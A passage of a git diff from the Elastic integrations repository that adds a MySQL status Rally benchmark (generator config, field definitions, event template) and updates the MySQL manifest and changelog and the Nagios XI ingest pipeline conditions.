status +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./status-benchmark/template.ndjson + config: + path: ./status-benchmark/config.yml + fields: + path: ./status-benchmark/fields.yml diff --git a/packages/mysql/_dev/benchmark/rally/status-benchmark/config.yml b/packages/mysql/_dev/benchmark/rally/status-benchmark/config.yml new file mode 100644 index 00000000000..c9334031864 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/status-benchmark/config.yml @@ -0,0 +1,333 @@ +fields: + - name: timestamp + period: 60m #one hour + - name: EventDuration + range: + min: 1 + max: 1000 + - name: service_address + enum: ["elastic-package-service_mysql_1", "elastic-package-service_mysql_2", "elastic-package-service_mysql_3"] + - name: aborted_clients + range: + min: 1 + max: 1000 + - name: aborted_connects + range: + min: 1 + max: 1000 + - name: errors_peer_address + range: + min: 1 + max: 1000 + - name: errors_accept + range: + min: 1 + max: 1000 + - name: errors_internal + range: + min: 1 + max: 1000 + - name: errors_max + range: + min: 1 + max: 1000 + - name: errors_tcpwrap + range: + min: 1 + max: 1000 + - name: errors_select + range: + min: 1 + max: 1000 + - name: ssl_hits + range: + min: 1 + max: 1000 + - name: ssl_misses + range: + min: 1 + max: 1000 + - name: ssl_size + range: + min: 1 + max: 1000 + - name: open_hits + range: + min: 100000 + max: 1000000 + - name: open_misses + range: + min: 1 + max: 1000 + - name: open_overflows + range: + min: 1 + max: 1000 + - name: disk_use + range: + min: 1 + max: 1000 + - name: use + range: + min: 1 + max: 1000 + - name: bytes_received + range: + min: 10000000 + max: 100000000 + - name: bytes_sent + range: + min: 10000000 + max: 100000000 + - name: threads_cached + range: + min: 1 + max: 1000 + - name: threads_created + range: + min: 1 + max: 1000 + - name: threads_connected + range: + min: 1 + max: 1000 + - name: threads_running + range: + min: 1 + max: 1000 + - name: tmp_disk_tables + range: + min: 1 + max: 1000 + - name: tmp_files + range: + min: 1 + max: 1000 + - name: tmp_tables + range: + min: 10000 + max: 100000 + - name: errors + range: + min: 1 + max: 1000 + - name: insert_threads + range: + min: 1 + max: 1000 + - name: writes + range: + min: 1 + max: 1000 + - name: flush_commands + range: + min: 1 + max: 1000 + - name: max_used_connections + range: + min: 10 + max: 100 + - name: open_files + range: + min: 1 + max: 1000 + - name: open_streams + range: + min: 1 + max: 1000 + - name: open_tables + range: + min: 1 + max: 1000 + - name: opened_tables + range: + min: 1 + max: 1000 + - name: connections + range: + min: 1 + max: 9 + - name: command_delete + range: + min: 1 + max: 1000 + - name: command_insert + range: + min: 1 + max: 1000 + - name: command_select + range: + min: 1 + max: 100000 + - name: command_update + range: + min: 1 + max: 1000 + - name: queries + range: + min: 1 + max: 100000 + - name: questions + range: + min: 1 + max: 100000 + - name: commit + range: + min: 1 + max: 1000 + - name: delete + range: + min: 1 + max: 1000 + - name: external_lock + range: + min: 100000 + max: 1000000 + - name: mrr_init + range: + min: 1 + max: 1000 + - name: prepare + range: + min: 1 + max: 1000 + - name: read_first + range: + min: 1 + max: 1000 + - name: read_key + range: + min: 1000 + max: 10000 + - name: read_last + range: + min: 1 + max: 1000 + - name: read_next + range: + min: 1 + max: 1000 + - name: read_prev + range: + min: 1000 + max: 10000 + - name: read_rnd + range: + min: 100000 + max: 1000000 + - name: read_rnd_next + range: + min: 10000000 + max: 100000000 + - name: rollback + range: + min: 1 + max: 1000 + - name: savepoint + range: + min: 1 + max: 1000 + - name: savepoint_rollback + range: + min: 1 + max: 1000 + - name: update + range: + min: 1 + max: 1000 + - name: write + range: + min: 10000000 + max: 100000000 + - name: rows_read + range: + min: 1 + max: 1000 + - name: rows_inserted + range: + min: 1 + max: 1000 + - name: rows_deleted + range: + min: 1 + max: 1000 + - name: rows_updated + range: + min: 1 + max: 1000 + - name: dump_status + range: + min: 1 + max: 1000 + - name: load_status + range: + min: 1 + max: 1000 + - name: bytes_data + range: + min: 10000000 + max: 100000000 + - name: bytes_dirty + range: + min: 1 + max: 1000 + - name: pages_data + range: + min: 1000 + max: 10000 + - name: pages_dirty + range: + min: 1 + max: 1000 + - name: pages_flushed + range: + min: 1 + max: 1000 + - name: pages_free + range: + min: 1 + max: 1000 + - name: pages_latched + range: + min: 1 + max: 1000 + - name: pages_misc + range: + min: 1 + max: 1000 + - name: pages_total + range: + min: 1001 + max: 10000 + - name: read_ahead + range: + min: 1000 + max: 10000 + - name: read_ahead_evicted + range: + min: 1 + max: 1000 + - name: read_ahead_rnd + range: + min: 1 + max: 1000 + - name: read_requests + range: + min: 10000 + max: 100000 + - name: pool_reads + range: + min: 10000 + max: 100000 + - name: pool_resize_status + range: + min: 10000 + max: 100000 + - name: pool_wait_free + range: + min: 1 + max: 1000 + - name: write_requests + range: + min: 1000 + max: 10000 diff --git a/packages/mysql/_dev/benchmark/rally/status-benchmark/fields.yml b/packages/mysql/_dev/benchmark/rally/status-benchmark/fields.yml new file mode 100644 index 00000000000..da198893879 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/status-benchmark/fields.yml @@ -0,0 +1,172 @@ +- name: agent_ephemeral_id + type: keyword +- name: agent_name + type: keyword +- name: EventDuration + type: long +- name: service_address + type: keyword +- name: timestamp + type: date +- name: aborted_clients + type: long +- name: aborted_connects + type: long +- name: errors_peer_address + type: long +- name: errors_accept + type: long +- name: errors_internal + type: long +- name: errors_max + type: long +- name: errors_tcpwrap + type: long +- name: errors_select + type: long +- name: ssl_hits + type: long +- name: ssl_misses + type: long +- name: ssl_size + type: long +- name: open_hits + type: long +- name: open_misses + type: long +- name: open_overflows + type: long +- name: disk_use + type: long +- name: use + type: long +- name: bytes_received + type: long +- name: bytes_sent + type: long +- name: threads_cached + type: long +- name: threads_created + type: long +- name: threads_connected + type: long +- name: threads_running + type: long +- name: tmp_disk_tables + type: long +- name: tmp_files + type: long +- name: tmp_tables + type: long +- name: errors + type: long +- name: insert_threads + type: long +- name: writes + type: long +- name: flush_commands + type: long +- name: max_used_connections + type: long +- name: open_files + type: long +- name: open_streams + type: long +- name: open_tables + type: long +- name: opened_tables + type: long +- name: connections + type: long +- name: command_delete + type: long +- name: command_insert + type: long +- name: command_select + type: long +- name: command_update + type: long +- name: queries + type: long +- name: questions + type: long +- name: commit + type: long +- name: delete + type: long +- name: external_lock + type: long +- name: mrr_init + type: long +- name: prepare + type: long +- name: read_first + type: long +- name: read_key + type: long +- name: read_last + type: long +- name: read_next + type: long +- name: read_prev + type: long +- name: read_rnd + type: long +- name: read_rnd_next + type: long +- name: rollback + type: long +- name: savepoint + type: long +- name: savepoint_rollback + type: long +- name: update + type: long +- name: write + type: long +- name: rows_read + type: long +- name: rows_inserted + type: long +- name: rows_deleted + type: long +- name: rows_updated + type: long +- name: dump_status + type: long +- name: load_status + type: long +- name: bytes_data + type: long +- name: bytes_dirty + type: long +- name: pages_data + type: long +- name: pages_dirty + type: long +- name: pages_flushed + type: long +- name: pages_free + type: long +- name: pages_latched + type: long +- name: pages_misc + type: long +- name: pages_total + type: long +- name: read_ahead + type: long +- name: read_ahead_evicted + type: long +- name: read_ahead_rnd + type: long +- name: read_requests + type: long +- name: pool_reads + type: long +- name: pool_resize_status + type: long +- name: pool_wait_free + type: long +- name: write_requests + type: long diff --git a/packages/mysql/_dev/benchmark/rally/status-benchmark/template.ndjson b/packages/mysql/_dev/benchmark/rally/status-benchmark/template.ndjson new file mode 100644 index 00000000000..126e2f7dad7 --- /dev/null +++ b/packages/mysql/_dev/benchmark/rally/status-benchmark/template.ndjson @@ -0,0 +1,244 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agent_name := generate "agent_name" }} +{{- $agent_ephemeral_id := generate "agent_ephemeral_id" }} +{{- $EventDuration := generate "EventDuration" }} +{{- $service_address := generate "service_address" }} +{{- $aborted_clients := generate "aborted_clients" }} +{{- $aborted_connects := generate "aborted_connects" }} +{{- $errors_peer_address := generate "errors_peer_address" }} +{{- $errors_accept := generate "errors_accept" }} +{{- $errors_internal := generate "errors_internal" }} +{{- $errors_max := generate "errors_max" }} +{{- $errors_tcpwrap := generate "errors_tcpwrap" }} +{{- $errors_select := generate "errors_select" }} +{{- $ssl_hits := generate "ssl_hits" }} +{{- $ssl_misses := generate "ssl_misses" }} +{{- $ssl_size := generate "ssl_size" }} +{{- $open_hits := generate "open_hits" }} +{{- $open_misses := generate "open_misses" }} +{{- $open_overflows := generate "open_overflows" }} +{{- $disk_use := generate "disk_use" }} +{{- $use := generate "use" }} +{{- $bytes_received := generate "bytes_received" }} +{{- $bytes_sent := generate "bytes_sent" }} +{{- $threads_running := generate "threads_running" }} +{{- $threads_cached := generate "threads_cached" }} +{{- $threads_created := generate "threads_created" }} +{{- $threads_connected := generate "threads_connected" }} +{{- $tmp_disk_tables := generate "tmp_disk_tables" }} +{{- $tmp_files := generate "tmp_files" }} +{{- $tmp_tables := generate "tmp_tables" }} +{{- $errors := generate "errors" }} +{{- $insert_threads := generate "insert_threads" }} +{{- $writes := generate "writes" }} +{{- $flush_commands := generate "flush_commands" }} +{{- $max_used_connections := generate "max_used_connections" }} +{{- $open_files := generate "open_files" }} +{{- $open_streams := generate "open_streams" }} +{{- $open_tables := generate "open_tables" }} +{{- $opened_tables := generate "opened_tables" }} +{{- $connections := generate "connections" }} +{{- $command_delete := generate "command_delete" }} +{{- $command_insert := generate "command_insert" }} +{{- $command_select := generate "command_select" }} +{{- $command_update := generate "command_update" }} +{{- $queries := generate "queries" }} +{{- $questions := generate "questions" }} +{{- $commit := generate "commit" }} +{{- $delete := generate "delete" }} +{{- $external_lock := generate "external_lock" }} +{{- $mrr_init := generate "mrr_init" }} +{{- $prepare := generate "prepare" }} +{{- $read_first := generate "read_first" }} +{{- $read_key := generate "read_key" }} +{{- $read_last := generate "read_last" }} +{{- $read_next := generate "read_next" }} +{{- $read_prev := generate "read_prev" }} +{{- $read_rnd := generate "read_rnd" }} +{{- $read_rnd_next := generate "read_rnd_next" }} +{{- $rollback := generate "rollback" }} +{{- $savepoint := generate "savepoint" }} +{{- $savepoint_rollback := generate "savepoint_rollback" }} +{{- $update := generate "update" }} +{{- $write := generate "write" }} +{{- $rows_read := generate "rows_read" }} +{{- $rows_inserted := generate "rows_inserted" }} +{{- $rows_deleted := generate "rows_deleted" }} +{{- $rows_updated := generate "rows_updated" }} +{{- $dump_status := generate "dump_status" }} +{{- $load_status := generate "load_status" }} +{{- $bytes_data := generate "bytes_data" }} +{{- $bytes_dirty := generate "bytes_dirty" }} +{{- $pages_data := generate "pages_data" }} +{{- $pages_dirty := generate "pages_dirty" }} +{{- $pages_flushed := generate "pages_flushed" }} +{{- $pages_free := generate "pages_free" }} +{{- $pages_latched := generate "pages_latched" }} +{{- $pages_misc := generate "pages_misc" }} +{{- $pages_total := generate "pages_total" }} +{{- $read_ahead := generate "read_ahead" }} +{{- $read_ahead_evicted := generate "read_ahead_evicted" }} +{{- $read_ahead_rnd := generate "read_ahead_rnd" }} +{{- $read_requests := generate "read_requests" }} +{{- $pool_reads := generate "pool_reads" }} +{{- $pool_resize_status := generate "pool_resize_status" }} +{{- $pool_wait_free := generate "pool_wait_free" }} +{{- $write_requests := generate "write_requests" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "mysql": { + "status": { + "max_used_connections": {{ $max_used_connections }}, + "queries": {{ $queries }}, + "handler": { + "prepare": {{ $prepare }}, + "savepoint": {{ $savepoint }}, + "update": {{ $update }}, + "delete": {{ $delete }}, + "read": { + "rnd_next": {{ $read_rnd_next }}, + "first": {{ $read_first }}, + "key": {{ $read_key }}, + "last": {{ $read_last }}, + "next": {{ $read_next }}, + "prev": {{ $read_prev }}, + "rnd": {{ $read_rnd }} + }, + "rollback": {{ $rollback }}, + "write": {{ $write }}, + "commit": {{ $commit }}, + "savepoint_rollback": {{ $savepoint_rollback }}, + "external_lock": {{ $external_lock }}, + "mrr_init": {{ $mrr_init }} + }, + "aborted": { + "clients": {{ $aborted_clients }}, + "connects": {{ $aborted_connects }} + }, + "errors": { + "peer_address": {{ $errors_peer_address }}, + "accept": {{ $errors_accept }}, + "internal": {{ $errors_internal }}, + "max": {{ $errors_max }}, + "tcpwrap": {{ $errors_tcpwrap }}, + "select": {{ $errors_select }} + }, + "ssl": { + "hits": {{ $ssl_hits }}, + "misses": {{ $ssl_misses }}, + "size": {{ $ssl_size }} + }, + "open": { + "hits": {{ $open_hits }}, + "misses": {{ $open_misses }}, + "overflows": {{ $open_overflows }}, + "streams": {{ $open_streams }}, + "tables": {{ $open_tables }}, + "files": {{ $open_files }} + }, + "threads": { + "running": {{ $threads_running }}, + "cached": {{ $threads_cached }}, + "created": {{ $threads_created }}, + "connected": {{ $threads_connected }} + }, + "flush_commands": {{ $flush_commands }}, + "created": { + "tmp": { + "disk_tables": {{ $tmp_disk_tables }}, + "files": {{ $tmp_files }} , + "tables": {{ $tmp_tables }} + } + }, + "connections": {{ $connections }}, + "command": { + "insert": {{ $command_insert }} , + "select": {{ $command_select }}, + "update": {{ $command_update }}, + "delete": {{ $command_delete }} + }, + "opened_tables": {{ $opened_tables }}, + "binlog": { + "cache": { + "use": {{ $use }} , + "disk_use": {{ $disk_use }} + } + }, + "delayed": { + "writes": {{ $writes }}, + "errors": {{ $errors }}, + "insert_threads": {{ $insert_threads }} + }, + "questions": {{ $questions }}, + "innodb": { + "buffer_pool": { + "rows": { + "read": {{ $rows_read }}, + "inserted": {{ $rows_inserted }}, + "deleted": {{ $rows_deleted }}, + "updated": {{ $rows_updated }} + }, + "dump_status": {{ $dump_status }}, + "load_status": {{ $load_status }}, + "read": { + "ahead_rnd": {{ $read_ahead_rnd }}, + "requests": {{ $read_requests }}, + "ahead": {{ $read_ahead }}, + "ahead_evicted": {{ $read_ahead_evicted }} + }, + "pool": { + "wait_free": {{ $pool_wait_free }} , + "reads": {{ $pool_reads }}, + "resize_status": {{ $pool_resize_status }} + }, + "write_requests": {{ $write_requests }}, + "bytes": { + "data": {{ $bytes_data }}, + "dirty": {{ $bytes_dirty }} + }, + "pages": { + "dirty": {{ $pages_dirty }}, + "flushed": {{ $pages_flushed }}, + "free": {{ $pages_free }}, + "misc": {{ $pages_misc }}, + "total": {{ $pages_total }}, + "data": {{ $pages_data }} + } + } + }, + "bytes": { + "received": {{ $bytes_received }}, + "sent": {{ $bytes_sent }} + } + } + }, + "event": { + "dataset": "mysql.status", + "module": "mysql", + "duration": {{ generate "EventDuration" }} + }, + "data_stream": { + "dataset": "mysql.status", + "namespace": "ep", + "type": "metrics" + }, + "metricset": { + "name": "status", + "period": 10000 + }, + "ecs": { + "version": "8.5.0" + }, + "agent": { + "id": "ede0be38-46a9-4ffc-8f1e-2ff9195193b6", + "version": "8.8.0", + "type": "metricbeat", + "name": "{{ $agent_name }}", + "ephemeral_id": "{{ $agent_ephemeral_id }}", + "hostname": "docker-fleet-agent" + }, + "service": { + "address": "{{ $service_address }}:3306", + "type": "mysql" + } +} \ No newline at end of file diff --git a/packages/mysql/changelog.yml b/packages/mysql/changelog.yml index fc7c8ee318f..a7f3b630e99 100644 --- a/packages/mysql/changelog.yml +++ b/packages/mysql/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: 1.19.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.18.2 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.18.1 + changes: + - description: Add missing dimension to the performance datastream. + type: bugfix + link: https://github.com/elastic/integrations/pull/9219 +- version: 1.18.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.17.0 changes: - description: Add support for tags, processors and the preserve_original_event to the error and slowlog datastreams. diff --git a/packages/mysql/data_stream/performance/fields/fields.yml b/packages/mysql/data_stream/performance/fields/fields.yml index bbdba5fc68d..9e3c110b980 100644 --- a/packages/mysql/data_stream/performance/fields/fields.yml +++ b/packages/mysql/data_stream/performance/fields/fields.yml @@ -49,6 +49,8 @@ description: Table name - name: index.name type: keyword + # To support multiple index names + dimension: true description: | Name of the index that was used when the table I/O wait event was recorded. PRIMARY indicates that table I/O used the primary index. NULL means that table I/O used no index. Inserts are counted against INDEX_NAME = NULL - name: count.fetch diff --git a/packages/mysql/manifest.yml b/packages/mysql/manifest.yml index 3d34b8d4133..e77e975c1e2 100644 --- a/packages/mysql/manifest.yml +++ b/packages/mysql/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: mysql title: MySQL -version: "1.17.0" +version: "1.19.0" description: Collect logs and metrics from MySQL servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.2" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -53,6 +53,7 @@ policy_templates: - name: password type: password title: Password + secret: true default: test owner: github: elastic/obs-infraobs-integrations diff --git a/packages/nagios_xi/changelog.yml b/packages/nagios_xi/changelog.yml index 709b29d7b8e..a5310b24781 100644 --- a/packages/nagios_xi/changelog.yml +++ b/packages/nagios_xi/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Fix ingest pipeline conditional field handling. + type: bugfix + link: https://github.com/elastic/integrations/pull/9003 - version: "1.2.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/nagios_xi/data_stream/events/elasticsearch/ingest_pipeline/default.yml b/packages/nagios_xi/data_stream/events/elasticsearch/ingest_pipeline/default.yml index e7a7b752721..98bd28740d8 100644 --- a/packages/nagios_xi/data_stream/events/elasticsearch/ingest_pipeline/default.yml +++ b/packages/nagios_xi/data_stream/events/elasticsearch/ingest_pipeline/default.yml @@ -102,7 +102,7 @@ processors: - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" ignore_failure: true ignore_missing: true diff --git a/packages/nagios_xi/data_stream/host/elasticsearch/ingest_pipeline/default.yml b/packages/nagios_xi/data_stream/host/elasticsearch/ingest_pipeline/default.yml index 13b4afc11ce..ad904ec33dd 100644 --- a/packages/nagios_xi/data_stream/host/elasticsearch/ingest_pipeline/default.yml +++ b/packages/nagios_xi/data_stream/host/elasticsearch/ingest_pipeline/default.yml @@ -259,25 +259,25 @@ processors: value: Up/Pending ignore_empty_value: true ignore_failure: true - if: ctx?.json?.current_state?.contains("0") + if: ctx.json?.current_state?.contains("0") == true - set: field: nagios_xi.host.current_state value: Warning ignore_empty_value: true ignore_failure: true - if: ctx?.json?.current_state?.contains("1") + if: ctx.json?.current_state?.contains("1") == true - set: field: nagios_xi.host.current_state value: Critical ignore_empty_value: true ignore_failure: true - if: ctx?.json?.current_state?.contains("2") + if: ctx.json?.current_state?.contains("2") == true - set: field: nagios_xi.host.current_state value: Unknown ignore_empty_value: true ignore_failure: true - if: ctx?.json?.current_state?.contains("3") + if: ctx.json?.current_state?.contains("3") == true - rename: field: json.has_been_checked target_field: nagios_xi.host.has_been_checked @@ -447,7 +447,7 @@ processors: drop(ctx); - remove: field: event.original - if: ctx?.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) ignore_failure: true ignore_missing: true - remove: diff --git a/packages/nagios_xi/data_stream/service/elasticsearch/ingest_pipeline/default.yml b/packages/nagios_xi/data_stream/service/elasticsearch/ingest_pipeline/default.yml index 776a310d272..081987ed292 100644 --- a/packages/nagios_xi/data_stream/service/elasticsearch/ingest_pipeline/default.yml +++ b/packages/nagios_xi/data_stream/service/elasticsearch/ingest_pipeline/default.yml @@ -239,25 +239,25 @@ processors: value: Up/Pending ignore_empty_value: true ignore_failure: true - if: ctx?.json?.current_state?.contains("0") + if: ctx.json?.current_state?.contains("0") == true - set: field: nagios_xi.service.current_state value: Warning ignore_empty_value: true ignore_failure: true - if: ctx?.json?.current_state?.contains("1") + if: ctx.json?.current_state?.contains("1") == true - set: field: nagios_xi.service.current_state value: Critical ignore_empty_value: true ignore_failure: true - if: ctx?.json?.current_state?.contains("2") + if: ctx.json?.current_state?.contains("2") == true - set: field: nagios_xi.service.current_state value: Unknown ignore_empty_value: true ignore_failure: true - if: ctx?.json?.current_state?.contains("3") + if: ctx.json?.current_state?.contains("3") == true - rename: field: json.has_been_checked target_field: nagios_xi.service.has_been_checked @@ -395,13 +395,13 @@ processors: override: true ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_users") + if: ctx.nagios_xi?.service?.check_command?.contains("check_local_users") == true - dissect: field: nagios_xi.service.current_users.performance_data pattern: users=%{nagios_xi.service.current_users.users};%{} ignore_missing: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("current_users") + if: ctx.nagios_xi?.service?.containsKey("current_users") == true - convert: field: nagios_xi.service.current_users.users type: double @@ -412,7 +412,7 @@ processors: value: nagios_xi.current_users ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("current_users") + if: ctx.nagios_xi?.service?.containsKey("current_users") == true - set: copy_from: nagios_xi.service.temp @@ -420,13 +420,13 @@ processors: override: true ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_load") + if: ctx.nagios_xi?.service?.check_command?.contains("check_local_load") == true - dissect: field: nagios_xi.service.current_load.performance_data pattern: load1=%{nagios_xi.service.current_load.load1};%{?}load5=%{nagios_xi.service.current_load.load5};%{?}load15=%{nagios_xi.service.current_load.load15};%{?} ignore_missing: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("current_load") + if: ctx.nagios_xi?.service?.containsKey("current_load") == true - convert: field: nagios_xi.service.current_load.load1 type: double @@ -447,7 +447,7 @@ processors: value: nagios_xi.current_load ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("current_load") + if: ctx.nagios_xi?.service?.containsKey("current_load") == true - set: copy_from: nagios_xi.service.temp @@ -455,13 +455,17 @@ processors: override: true ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.check_command?.contains("check_ssh") || ctx?.nagios_xi?.service?.check_command?.contains("check_xi_service_ssh") + if: >- + ctx.nagios_xi?.service?.check_command != null && ( + ctx.nagios_xi.service.check_command?.contains("check_ssh") || + ctx.nagios_xi.service.check_command?.contains("check_xi_service_ssh") + ) - dissect: field: nagios_xi.service.ssh.performance_data pattern: time=%{nagios_xi.service.ssh.time}s%{} ignore_missing: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("ssh") + if: ctx.nagios_xi?.service?.containsKey("ssh") == true - convert: field: nagios_xi.service.ssh.time type: double @@ -472,7 +476,7 @@ processors: value: nagios_xi.ssh ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("ssh") + if: ctx.nagios_xi?.service?.containsKey("ssh") == true - set: copy_from: nagios_xi.service.temp @@ -480,13 +484,17 @@ processors: override: true ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.check_command?.contains("check_ping") || ctx?.nagios_xi?.service?.check_command?.contains("check_xi_service_ping") + if: >- + ctx.nagios_xi?.service?.check_command != null && ( + ctx.nagios_xi.service.check_command?.contains("check_ping") || + ctx.nagios_xi.service.check_command?.contains("check_xi_service_ping") + ) - dissect: field: nagios_xi.service.ping.performance_data pattern: rta=%{nagios_xi.service.ping.rta}ms;%{?}pl=%{nagios_xi.service.ping.pl}%;%{?} ignore_missing: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("ping") + if: ctx.nagios_xi?.service?.containsKey("ping") == true - convert: field: nagios_xi.service.ping.rta type: double @@ -502,7 +510,7 @@ processors: value: nagios_xi.ping ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("ping") + if: ctx.nagios_xi?.service?.containsKey("ping") == true - set: copy_from: nagios_xi.service.temp @@ -510,13 +518,13 @@ processors: override: true ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_swap") + if: ctx.nagios_xi?.service?.check_command?.contains("check_local_swap") == true - dissect: field: nagios_xi.service.swap_usage.performance_data pattern: swap=%{nagios_xi.service.swap_usage.free_swap}MB;%{};%{};%{};%{nagios_xi.service.swap_usage.total_swap} ignore_missing: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("swap_usage") + if: ctx.nagios_xi?.service?.containsKey("swap_usage") == true - convert: field: nagios_xi.service.swap_usage.free_swap type: long @@ -529,7 +537,7 @@ processors: ignore_failure: true - script: source: | - if(ctx?.nagios_xi?.service?.containsKey("swap_usage")) { + if(ctx.nagios_xi?.service?.containsKey("swap_usage") == true) { ctx.nagios_xi.service.swap_usage.used_swap = ctx.nagios_xi.service.swap_usage.total_swap - ctx.nagios_xi.service.swap_usage.free_swap } ignore_failure: true @@ -538,7 +546,7 @@ processors: value: nagios_xi.swap_usage ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("swap_usage") + if: ctx.nagios_xi?.service?.containsKey("swap_usage") == true - set: copy_from: nagios_xi.service.temp @@ -546,13 +554,13 @@ processors: override: true ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_procs") + if: ctx.nagios_xi?.service?.check_command?.contains("check_local_procs") == true - dissect: field: nagios_xi.service.process.performance_data pattern: procs=%{nagios_xi.service.process.total};%{} ignore_missing: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("process") + if: ctx.nagios_xi?.service?.containsKey("process") == true - convert: field: nagios_xi.service.process.total type: double @@ -563,7 +571,7 @@ processors: value: nagios_xi.process ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("process") + if: ctx.nagios_xi?.service?.containsKey("process") == true - set: copy_from: nagios_xi.service.temp @@ -571,13 +579,17 @@ processors: override: true ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.check_command?.contains("check_http") || ctx?.nagios_xi?.service?.check_command?.contains("check_xi_service_http") + if: >- + ctx.nagios_xi?.service?.check_command != null && ( + ctx.nagios_xi.service.check_command?.contains("check_http") || + ctx.nagios_xi.service.check_command?.contains("check_xi_service_http") + ) - dissect: field: nagios_xi.service.http.performance_data pattern: time=%{nagios_xi.service.http.time}s;;;%{?un}size=%{nagios_xi.service.http.size}B;%{?} ignore_missing: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("http") + if: ctx.nagios_xi?.service?.containsKey("http") == true - convert: field: nagios_xi.service.http.time type: double @@ -593,7 +605,7 @@ processors: value: nagios_xi.http ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("http") + if: ctx.nagios_xi?.service?.containsKey("http") == true - set: copy_from: nagios_xi.service.temp @@ -601,13 +613,13 @@ processors: override: true ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_disk") + if: ctx.nagios_xi?.service?.check_command?.contains("check_local_disk") == true - dissect: field: nagios_xi.service.root_partition.performance_data pattern: "%{?}=%{nagios_xi.service.root_partition.used_space}M%{};%{};%{};%{};%{nagios_xi.service.root_partition.total_space}" ignore_missing: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("root_partition") + if: ctx.nagios_xi?.service?.containsKey("root_partition") == true - convert: field: nagios_xi.service.root_partition.total_space type: long @@ -620,7 +632,7 @@ processors: ignore_failure: true - script: source: | - if(ctx?.nagios_xi?.service?.containsKey("root_partition")) { + if(ctx.nagios_xi?.service?.containsKey("root_partition") == true) { ctx.nagios_xi.service.root_partition.free_space = ctx.nagios_xi.service.root_partition.total_space - ctx.nagios_xi.service.root_partition.used_space } ignore_failure: true @@ -629,22 +641,32 @@ processors: value: nagios_xi.root_partition ignore_empty_value: true ignore_failure: true - if: ctx?.nagios_xi?.service?.containsKey("root_partition") + if: ctx.nagios_xi?.service?.containsKey("root_partition") == true - set: field: event.dataset value: nagios_xi.custom ignore_empty_value: true ignore_failure: true - if: '!(ctx?.nagios_xi?.service?.containsKey("current_users") || ctx?.nagios_xi?.service?.containsKey("current_load") || ctx?.nagios_xi?.service?.containsKey("ssh") || ctx?.nagios_xi?.service?.containsKey("ping") || ctx?.nagios_xi?.service?.containsKey("swap_usage") || ctx?.nagios_xi?.service?.containsKey("process") || ctx?.nagios_xi?.service?.containsKey("http") || ctx?.nagios_xi?.service?.containsKey("root_partition"))' + if: >- + ctx.nagios_xi?.service == null || !( + ctx.nagios_xi.service.containsKey("current_users") || + ctx.nagios_xi.service.containsKey("current_load") || + ctx.nagios_xi.service.containsKey("ssh") || + ctx.nagios_xi.service.containsKey("ping") || + ctx.nagios_xi.service.containsKey("swap_usage") || + ctx.nagios_xi.service.containsKey("process") || + ctx.nagios_xi.service.containsKey("http") || + ctx.nagios_xi.service.containsKey("root_partition") + ) - set: copy_from: nagios_xi.service.temp field: nagios_xi.service.custom override: true ignore_empty_value: true ignore_failure: true - if: ctx?.event?.dataset?.contains("nagios_xi.custom") - + if: ctx.event?.dataset?.contains("nagios_xi.custom") == true + - set: field: event.kind value: metric @@ -681,7 +703,7 @@ processors: - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" ignore_failure: true ignore_missing: true diff --git a/packages/nagios_xi/manifest.yml b/packages/nagios_xi/manifest.yml index 4ebd15e970c..ba71585e6e5 100644 --- a/packages/nagios_xi/manifest.yml +++ b/packages/nagios_xi/manifest.yml @@ -1,7 +1,7 